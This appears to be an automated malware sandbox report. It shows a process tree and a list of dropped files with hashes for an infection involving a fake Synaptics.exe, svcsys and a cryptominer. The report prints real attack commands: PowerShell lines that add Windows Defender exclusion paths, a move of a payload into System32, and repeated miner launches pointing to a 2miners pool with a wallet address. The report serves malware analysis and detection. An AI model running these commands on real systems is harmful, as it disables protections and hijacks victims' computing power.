                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1472 -ip 1472
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:4876
                                                                                                                                                                                                  • C:\ProgramData\svcsys
                                                                                                                                                                                                    "C:\ProgramData\svcsys"
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:4432
                                                                                                                                                                                                  • C:\ProgramData\svcsys
                                                                                                                                                                                                    "C:\ProgramData\svcsys"
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:1984
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5048 -ip 5048
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:2576
                                                                                                                                                                                                    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                                                                                                                                                                                      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:2372
                                                                                                                                                                                                    • C:\ProgramData\svcsys
                                                                                                                                                                                                      "C:\ProgramData\svcsys"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:1676
                                                                                                                                                                                                    • C:\ProgramData\svcsys
                                                                                                                                                                                                      "C:\ProgramData\svcsys"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:5152
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Eszop.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Eszop.exe"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:6132
                                                                                                                                                                                                    • C:\ProgramData\svcsys
                                                                                                                                                                                                      "C:\ProgramData\svcsys"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:5908
                                                                                                                                                                                                    • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                                      "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:1028
                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k DcomLaunch
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                      PID:3136
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5512
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                            PID:4816
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'G:\'
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5496
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'G:\'
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              PID:5636
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'H:\'
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4172
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'H:\'
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                PID:4192
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              cmd.exe /c start "" "c:\windows\system32\winsvcf\x138062.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:3324
                                                                                                                                                                                                                • \??\c:\windows\system32\winsvcf\x138062.exe
                                                                                                                                                                                                                  "c:\windows\system32\winsvcf\x138062.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5960
                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                      cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:5556
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                          PID:4508
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:840
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                            PID:680
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          cmd.exe /c timeout /t 5 /nobreak && move "c:\windows\system32\winsvcf\x138062.exe" "C:\Windows\System32" && start "" "C:\Windows\System32\x138062.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:5856
                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                              timeout /t 5 /nobreak
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                              PID:5196
                                                                                                                                                                                                                            • C:\Windows\System32\x138062.exe
                                                                                                                                                                                                                              "C:\Windows\System32\x138062.exe"
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:3416
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          cmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:1708
                                                                                                                                                                                                                            • \??\c:\windows\system32\winsvcf\x397670.dat
                                                                                                                                                                                                                              x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                              PID:1580
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:2288
                                                                                                                                                                                                                              • \??\c:\windows\system32\crypti.exe
                                                                                                                                                                                                                                "c:\windows\system32\crypti.exe"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3716
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                cmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:3076
                                                                                                                                                                                                                                  • \??\c:\windows\system32\winsvcf\x397670.dat
                                                                                                                                                                                                                                    x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                    PID:5944
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  cmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:5560
                                                                                                                                                                                                                                    • \??\c:\windows\system32\winsvcf\x397670.dat
                                                                                                                                                                                                                                      x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                      PID:5252
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    cmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:5144
                                                                                                                                                                                                                                      • \??\c:\windows\system32\winsvcf\x397670.dat
                                                                                                                                                                                                                                        x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                        PID:396
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      cmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:5440
                                                                                                                                                                                                                                        • \??\c:\windows\system32\winsvcf\x397670.dat
                                                                                                                                                                                                                                          x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                          PID:3344
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        cmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:2920
                                                                                                                                                                                                                                          • \??\c:\windows\system32\winsvcf\x397670.dat
                                                                                                                                                                                                                                            x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                            PID:5776
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          cmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:5392
                                                                                                                                                                                                                                            • \??\c:\windows\system32\winsvcf\x397670.dat
                                                                                                                                                                                                                                              x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                              PID:236
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            cmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:5372
                                                                                                                                                                                                                                              • \??\c:\windows\system32\winsvcf\x397670.dat
                                                                                                                                                                                                                                                x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:2768
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                cmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:2420
                                                                                                                                                                                                                                                  • \??\c:\windows\system32\winsvcf\x397670.dat
                                                                                                                                                                                                                                                    x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=50
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:6004
                                                                                                                                                                                                                                                • C:\ProgramData\svcsys
                                                                                                                                                                                                                                                  "C:\ProgramData\svcsys"
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  PID:3676
                                                                                                                                                                                                                                                • C:\ProgramData\svcsys
                                                                                                                                                                                                                                                  "C:\ProgramData\svcsys"
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  PID:2268

                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                • C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  753KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  075045f176129f6b11d627db7c7a3c76

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  d815d313d2882041b8adb063eda6a8bd62149443

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  86586abd265e12fc63222aff947d6acb4f3d28b148f9c5abc5d548d74795f9c8

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  86e9aff5e3cde31a9a553108f833003a9d905c1a1c1db72dca80cf0816ddabe63d18b8d7a616717c2f01f10148bc06915af0b9c4222305d5681d29d3b9d9198b

                                                                                                                                                                                                                                                • C:\ProgramData\svcsys

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  256KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  8fdf47e0ff70c40ed3a17014aeea4232

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  e6256a0159688f0560b015da4d967f41cbf8c9bd

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  ed9884bac608c06b7057037cc91d90e4ae5f74dd2dbce2af476699c6d4492d82

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  bd69d092ed4f9c5e1f24eaf5ec79fb316469d53849dc798fae0fcba5e90869b77ee924c23cc6f692198ff25827ab60ad47bb46cadd6e0aadde7731cbafb013be

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  f811272c20ff6decbbd16ff364334427

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  cb31be66c972daa61d45920fa2fa824c1dfb194d

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  730aff8c9e430a9f9e5e44f1c376e57f42fa5adc744824df2f69855009473592

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  5c68bf3a41c3607cad5abe94f2bb3816f3e69426fa7d43bf7c9787c4e9ce6660b1843a2e505a22a93d7008b76fc564078513fe9ef47051e5b6fc344ab9d0a528

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svcsys.log

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  841B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  c9a1db4c19a820048ba7767749c71dfd

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  a16119485f9e2921b482bcd16e8d9834039f303e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  d3f63215eab4e0079782c2afeebd3a20fbb6ce501c2e3632dbc133f1899ca286

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  cf8c810471aebf6c825da7673184c907f4345712798e926023321bb9352d3459c41e8ca9e0f30681c11265ac887761e2d2eaceb6672361d3c5f3abf8659ef0a8

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  21KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  3b44178fdc14c583b87c5ce93c821c9e

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7bb2e1b629ab23f55fa46c412bdfe50bc2d165b6

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  053ac4ca4a294dbb888d5e6c639578f465ef370689edce6b92cdebaff549cdea

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  0e5c723555f0b60ba0fc8b46f1ef28004764b0e955829ffe1cf5ad20415a34f53e3941161a38585d7186f6175f5518b75d9c8bcc2814f6ddf2ba5fb2486ca5d6

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  21KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  0a0310cafc47f517d4d71331738dcb72

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  12f9c99be715bd7211cda2bfc000498351bde39e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  14fcfd0224cfe43cf2c2410f976d07c2985219988123e516269a0ac7cc27b102

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  2d27c1c761e46bcd463fdafbdf04130a9fb120e903a7ffd0f60ead8b5193f2bb2520953af2a350f6b57e8a3d185d747c48fc3dc189f925f220a0a7162a33590e

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  21KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  e8e5bd79a3c9e1e9b40546e4f343d674

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  8cb44728dd7482bf6dbe11144391013085ab8e22

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  8a916ec80c7982ef0fc0b2d752ec497529c57f4f1722de3b6b923fe2ce1cb54e

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  c7ea6ac07d747f587088842c0024f77ce4f589f0548ba1215292eecb37c8aa4c5b8f4bce3b684c9ebae85c7551b5d1bd50b6d4b59263f665c155625b02d88a39

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1CFhkz8SxG0Q.bat

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  210B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  689b811191fb438e9ef43b45efc26dd3

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  932f9eb86c0cb2936454e0e5365c8797ee0ca013

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  e2d8ae41a5180f819c3c7695604b49ca2acb863a0e98f5486f64798bcaf02882

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  ac1a0b3dd0fa90960f9fe760f87b025459d6a0b880bd7a98e6bf3ab471176287518424d3d6cf4dd47b2dddebc05c46899ab945f872ec008fe8ac20c53814088a

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1FRvylL6VCZp.bat

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  212B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  86a29005ac80aade2f519f26fdede63d

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  a286794c100a0374601974bc3f56ee033aeb7888

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  92ef853feb76a22f6ec3e25be4c6bc4b16495a8eebfcda5db237682e3e79729a

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  340d1543c5f7047c30f92da4242f4f28934a835dece4efca6085b785c5237e0aaa05517c53b69301a13d1cd8eeca5ab3c4a7f799e656d3036a457a24e49bc05c

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1OEpgI8cNZZp.bat

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  210B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  99360341e237f4ad94be451f7e05088f

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  dbb5a828868456d812eb14df54fea13be6af51ec

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  0c7ab1a75915110a3a52317c9180779d5e65d00aaa240449cea31289126357be

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  0a1dc06950a135443daf43efbd4356cf0f59b39a637918e51ebe2ac6acb1a76522166244ca19faa234e70b55d2c3e9d27b713e0d59cdeeed9d4b45e4ec4eb348

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1iytKINj1YAv.bat

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  210B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  2c5a98a1814d82932bffdd8b2a2a54c8

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  69a6d2aaf85147d251761ebbbe6e81854f26f3d4

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  a7313f1f99343218f3a0c4f937526b97e9df7f2c3101fb04f70095b5795fa64d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  aaff063dd81e2fcc3b1722942552a0fdd39f89fa3f41d08870bdef2f37d6f96d69d66679f885e83dda148138789efcd1c0628474357c51b8d2f8577436f69917

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1zEIBHtViAMV.bat

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  210B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  0ac75e0e451c6d208f6ac905bab6676a

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  3d51f385507133dabd2a1bb9c0e3567f7a6e9bc6

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  2e4a355508f3a4f2be92be8fbb0641bf3e68f04e5de2857d9d1cf2b34098cdc9

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  392202cedbc852fefd3bf8bd6f0dac1c06e87b9f1854fb82cc1dae821879cf5998bc661a1a2293aedc4625b4206e9faf0008063b3ddacee19d785897a0618ac6

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7P5mQdWx91Hz.bat

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  210B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  201b28c172c0b32c833b2200e8bfd941

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  a3e041fc91d11ee682cc529e28c149917f79dbea

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  b9184df32bbbe2c574038b3919ca148450ca6705aeb8ccf346ea3c132c748dec

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  2dd45431cfaf8f9e30de6cdbc1719b33c7324f2dac0724d9a4d1cc7eb59f08dec6375d3f6368a3c16d4afbf643af156a84c33955f49b4a8b2411d7b8d745d74a

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\89RWZsruzKro.bat

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  210B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  bebc16cfd98733ed431e12f8c63bc364

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  f55b96c5a0db5e8d15b85f55fb0b2a48801ee9f8

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  8ae423fb3ecf69c384f0f403474dcfd54b48362f3f1469203fd031952a6a5b26

                                                                                                                                                                                                                                                  SHA512

